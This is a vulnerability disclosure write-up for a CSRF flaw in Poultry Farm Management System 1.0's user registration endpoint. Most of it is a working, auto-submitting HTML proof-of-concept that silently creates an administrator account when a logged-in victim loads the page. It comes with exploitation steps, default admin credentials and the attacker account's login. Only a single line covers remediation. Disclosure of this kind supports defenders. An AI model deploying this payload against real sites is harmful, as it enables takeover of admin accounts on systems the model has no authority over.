CSRF on Poultry Farm Management System 1.0
Poultry Farm Management System 1.0 suffers from CSRF attack via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an…
Poultry Farm Management System 1.0 suffers from CSRF attack via /Redcock-Farm/farm/userregister.php. Exploiting this issue allows an attacker to create a user with admin rights by sending a crafter payload to an authenticated user.
Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
Tested on: Ubuntu 20.04.5 LTS + PHP 7.4.3, Apache 2.4.41
Identification
Let’s open the code and see the root cause.
newuser_from.php is responsible for creating users.
Since there is no CSRF protection, we can create a new user if someone clicks on our payload hosted on our site.
Exploitation
let’s create a HTML form similar to the newuser_form form and populate it with new user values.
GitHub link: https://gist.github.com/gowthamaraj/afc485841bcf227cdc5c71fc16800ebb
PoC HTML:
<html>
<form enctype="application/x-www-form-urlencoded" method="POST" action="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
<table>
<tr>
<td>dignity</td>
<td><input type="text" value="Admin" name="dignity"></td>
</tr>
<tr>
<td>staffid</td>
<td><input type="text" value="1" name="staffid"></td>
</tr>
<tr>
<td>fullname</td>
<td><input type="text" value="foxy" name="fullname"></td>
</tr>
<tr>
<td>firstname</td>
<td><input type="text" value="purple" name="firstname"></td>
</tr>
<tr>
<td>lastname</td>
<td><input type="text" value="foxy" name="lastname"></td>
</tr>
<tr>
<td>mobileno</td>
<td><input type="text" value="9000980008" name="mobileno"></td>
</tr>
<tr>
<td>emailid</td>
<td><input type="text" value="foxy@gmail.com" name="emailid"></td>
</tr>
<tr>
<td>password</td>
<td><input type="text" value="password" name="password"></td>
</tr>
<tr>
<td>confirmpassword</td>
<td><input type="text" value="password" name="confirmpassword"></td>
</tr>
<tr>
<td>signup</td>
<td><input type="text" value="Register" name="signup"></td>
</tr>
</table><input type="submit" value="http://20.163.26.136/Redcock-Farm/farm/userregister.php">
</form>
<script>
document.forms[0].submit();
</script>
</html>
change the URLs in the PoC to your target website URL.
I hosted the HTML page at http://20.163.26.136/Redcock-Farm/poc.html for testing. However, you can save the file locally and visit it to test.
Let’s log in to the website using the default credentials provided to us.
Username : ndbhalerao91@gmail.com
Password : admin
Once logged in, visit the poc.html hosted by you.
The user is successfully created.
we can log in to the website as admin using the user we just created
Username: foxy@gmail.com
Password: password
Remediation
- Use of CSRF tokens